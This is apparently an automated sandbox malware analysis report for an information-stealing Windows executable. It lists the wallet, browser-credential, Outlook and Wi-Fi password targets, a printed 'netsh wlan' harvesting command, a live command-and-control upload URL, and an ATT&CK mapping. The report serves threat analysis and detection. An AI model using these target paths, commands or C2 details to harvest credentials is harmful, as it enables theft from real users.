Source: VaXmr82RIb.exe, 00000000.00000002.30087188792.0000000007EF4000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30083365298.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30088042498.0000000008360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx`,jq
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-jq
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq1C:\Users\user\AppData\Roaming\Ethereum\keystoret-jq
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3 WalletLRjqHDp
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-jq
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq1C:\Users\user\AppData\Roaming\Ethereum\keystoret-jq

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: VaXmr82RIb.exe PID: 3364, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	831 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	2 Obfuscated Files or Information	LSASS Memory	134 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	931 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	62 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	3 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	62 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
VaXmr82RIb.exe	100%	Avira	TR/AVI.Agent.msilv
VaXmr82RIb.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Ursu
VaXmr82RIb.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://89.23.100.233:1488	0%	Avira URL Cloud	safe
http://89.23.100.233:1488/uploadt	0%	Avira URL Cloud	safe
http://89.23.100.233:1488/upload	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
icanhazip.com	104.16.184.241	true	false		high
246.229.1.0.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false		high
http://89.23.100.233:1488/upload	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	tmp7983.tmp.dat.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr	false		high
https://duckduckgo.com/chrome_newtab	VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmp795F.tmp.dat.0.dr	false		high
http://89.23.100.233:1488/uploadt	VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	false		high
http://89.23.100.233:1488	VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp795F.tmp.dat.0.dr	false		high
http://icanhazip.com	VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp7983.tmp.dat.0.dr	false		high
https://gemini.google.com/app?q=	tmp7983.tmp.dat.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.23.100.233	unknown	Russian Federation		48687	MAXITEL-ASRU	true
104.16.184.241	icanhazip.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568299
Start date and time:	2024-12-04 14:42:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VaXmr82RIb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/18@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 235 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: VaXmr82RIb.exe

Simulations

Behavior and APIs

Time	Type	Description
08:44:38	API Interceptor	67x Sleep call for process: VaXmr82RIb.exe modified
08:44:49	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.23.100.233	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse
	file.exe	Get hash	malicious	Flesh Stealer	Browse
	L814CyOxMT.exe	Get hash	malicious	Flesh Stealer, PureLog Stealer, zgRAT	Browse
	vbe11TPn2x.exe	Get hash	malicious	Flesh Stealer	Browse
	zufmUwylvo.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse
	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse
	SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exe	Get hash	malicious	Unknown	Browse
104.16.184.241	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	uyz4YPUyc9.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	icanhazip.com/
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	vbe11TPn2x.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	zufmUwylvo.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
icanhazip.com	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.16.184.241
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241
	uyz4YPUyc9.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	104.16.184.241
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	104.16.185.241
	test2.exe	Get hash	malicious	Unknown	Browse	104.16.185.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	QsEn4Jw9pY.lnk	Get hash	malicious	Unknown	Browse	172.67.201.111
	https://cdn.tailwindcss.com	Get hash	malicious	Unknown	Browse	104.22.21.144
	fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	ylNk78QlB8.lnk	Get hash	malicious	Unknown	Browse	172.67.201.111
	sF5nNt8usL.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
	oLY6JbNl9i.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
	9aTcxCmLgM.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
	4l5IFxl9t3.bat	Get hash	malicious	Unknown	Browse	162.159.61.3
	B3N4x4meoJ.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
MAXITEL-ASRU	Installer_setup32_64x.exe	Get hash	malicious	LummaC, Stealc	Browse	89.23.96.109
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	89.23.100.233
	file.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	L814CyOxMT.exe	Get hash	malicious	Flesh Stealer, PureLog Stealer, zgRAT	Browse	89.23.100.233
	vbe11TPn2x.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	Ham9SAD0Ou.doc	Get hash	malicious	Unknown	Browse	89.23.98.98
	file.dll	Get hash	malicious	Matanbuchus	Browse	89.23.113.220
	file.dll	Get hash	malicious	Matanbuchus	Browse	89.23.113.220
	zufmUwylvo.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	89.23.100.233

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VaXmr82RIb.exe_1a9683306ea2827b2085839add5dd3a548da7d92_deb3b68b_34961951-19ca-473f-9ff2-2ee286841b52\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.418626455954073
Encrypted:	false
SSDEEP:	192:3gscZdxjc+rmWbktauo75E6UVWA9R25ndDu76kfAIO8K:36ZDjAWbktal5EX94dDu76kfAIO8K
MD5:	3942F3D778754B64509D0AB3358BEC9A
SHA1:	FC57BDFB2568029356787BE0499FEE88569E603B
SHA-256:	4FE0666108ADDF255763E7294C5937A7AC685FB77C0F32C3AEEAFEF76C16A4B0
SHA-512:	1BDAF465EF40107C8D86221797B72A765B205A52E7297748B63E36EF319892ECE187F75FECE7B65E0066EEA439253CAF29B74121B61D2872AF4DB190386E42EF
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.3.4.8.6.5.1.9.6.2.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.3.4.8.7.0.1.9.4.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.9.6.1.9.5.1.-.1.9.c.a.-.4.7.3.f.-.9.f.f.2.-.2.e.e.2.8.6.8.4.1.b.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.6.1.1.a.6.8.-.3.7.1.7.-.4.6.b.4.-.9.7.0.9.-.1.5.e.2.0.1.e.c.7.3.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.a.X.m.r.8.2.R.I.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.2.4.-.0.0.0.1.-.0.0.5.0.-.9.6.2.0.-.4.6.a.4.5.2.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.7.3.4.6.0.6.1.f.7.e.7.0.e.c.a.b.f.1.8.3.1.f.e.9.6.4.e.4.d.0.0.8.0.b.3.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BB8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Wed Dec 4 13:44:46 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	260125
Entropy (8bit):	4.057891402390053
Encrypted:	false
SSDEEP:	3072:OgO3EyS94uEqYLTgECPOdOHfSY5rnhPNrtO:O3EyK4BTgECX8
MD5:	B9CAC37A5AC1F3BFDE89655CAA624874
SHA1:	C9635453891AB54D0A301669ECB3FB216A9589F7
SHA-256:	AB5517E0AD09A0DC31E31CB3F71C8958E3F0F905441FE2257AEB910228D6C5E3
SHA-512:	5C299BD921E6B2A4F0CE22AECA383183E5683729EDB5B646FFB37B2EB581CEBA09C776901BA62BEC041AB6F362840C3504005A46AADA9E1D3EF1658BE027E951
Malicious:	false
Preview:	MDMP..a..... ........\Pg............4............,..H.......<....4......T%..*G..........`.......8...........T............w..]...........@4..........,6..............................................................................bJ.......6......GenuineIntel...........T.......$....\Pg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CF1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.68079109253751
Encrypted:	false
SSDEEP:	192:R9l7lZNiIKl6m6Yv0SUjhtWgmfZdCP4YMpDT89bpuasfEjm:R9lnNix6m6YsSUtMgmfDCQwpu5f9
MD5:	79C71CA565122487E0936CB9FB6A6052
SHA1:	2E430BCD57B265A6EA3F01ABC8DB60310678AD86
SHA-256:	898CF3BEAA9C7A2684D3275075EE6CAB01C13F341163A8981DA8209BC2DF0DF7
SHA-512:	7B66840B34350856D3F607F5AC71C583F9E5F953DD42875F5955F11583961F17AD1798BCDF9041342DAC58352CE03F91B73303B4AFEEB10D1CA0F574D2E3E205
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D11.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4865
Entropy (8bit):	4.473644778192249
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsTe702I7VFJ5WS2Cfjkws3rm8M4JSVpLPF5Co+q8vlVpLyILNUk77FC:uILfq7GySPfSJSyoKlTLNVXSd
MD5:	5443D7E24AE5453C047A8A669576884D
SHA1:	F9A25E5057E41ACFB333E3626BFCE531878935A8
SHA-256:	F2D583ACD7E50A9ED199D61AFA9FD20A5F5B2DE91A7E8A73A60A94CDED8D8DCE
SHA-512:	15F11B42191C30BD452A632C6DBEAA91D70889B2B697DBDDB0655EFB2873B17149E7DCFE58D06E2B13A4A10179B35124F27F49DE3FDD60B2DD17C5B555FF60C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222960416" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Temp\shmb2z2y.tfi

Download File

Process:	C:\Users\user\Desktop\VaXmr82RIb.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	15119
Entropy (8bit):	5.63468773874796
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
MD5:	AFC16C019BBEB3904B37576B9179D9CD
SHA1:	DBA86847FFE7AD2E887F1A51FBD464357850488D
SHA-256:	8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
SHA-512:	752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
Malicious:	false
